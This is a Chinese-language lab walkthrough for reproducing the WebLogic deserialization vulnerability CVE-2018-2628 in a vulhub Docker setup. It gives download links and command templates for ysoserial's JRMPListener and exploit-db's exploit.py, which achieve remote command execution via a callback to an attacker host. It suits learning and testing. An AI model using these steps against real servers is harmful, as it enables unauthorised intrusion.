一、漏洞環境搭建
CVE-2018-2628影響的軟件版本為:
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3
需要准備的工具如下:
1.docker+vulhub漏洞庫
2.ysoserial-cve-2018-2628,下載鏈接https://github.com/tdy218/ysoserial-cve-2018-2628/releases
3.expolit.py腳本,下載鏈接https://www.exploit-db.com/exploits/44553
這里我使用的Ubuntu18.04虛擬機,直接進入環境
root@admin666-virtual-machine:~/vulhub-master/weblogic/CVE-2018-2628#
執行命令
root@admin666-virtual-machine:~/vulhub-master/weblogic/CVE-2018-2628#docker-compose up -d
等到出現done即表示搭建完成,可以訪問http://your-ip:7001
,出現如下頁面即代表搭建成功!
二、攻擊階段
攻擊機可以是Linux系統,也可以是Windows系統,在這里使用Windows10本機作為攻擊機,注意:Win10上需要有java環境和python環境(最好是python2,python3可能會運行報錯)
1.在攻擊機上使用ysoserial-cve-2018-2628工具,使用格式如下:
java -cp "ysoserial-0.1-cve-2018-2628-all.jar" ysoserial.exploit.JRMPListener [攻擊機監聽端口] jdk版本編號 "要執行的命令"
注:jdk版本只要大於1.7,直接填Jdk7u21就可以了
執行完后是這個樣子,注意不是所有的命令都可以執行
2.在攻擊機上使用exploit.py,使用格式如下:
python2 exploit.py 靶機IP 端口(默認7001) ysoserial-0.1-cve-2018-2628-all.jar的位置 攻擊機IP 攻擊機監聽端口 JRMPClient
這里為了省事,把這些工具都放在一個目錄下,執行完后是這個樣子
出現這種情況代表已經成功!如果沒成功可能有2個原因:
(1)python版本不對,腳本執行報錯,建議使用python2
(2)主機防火牆開着,靶機可能訪問不了主機監聽的端口,可以試着直接關掉防火牆
三、驗證是否攻擊成功
進入虛擬機環境,輸入docker-compose exec weblogic bash,查看/tmp下是否生成了test文件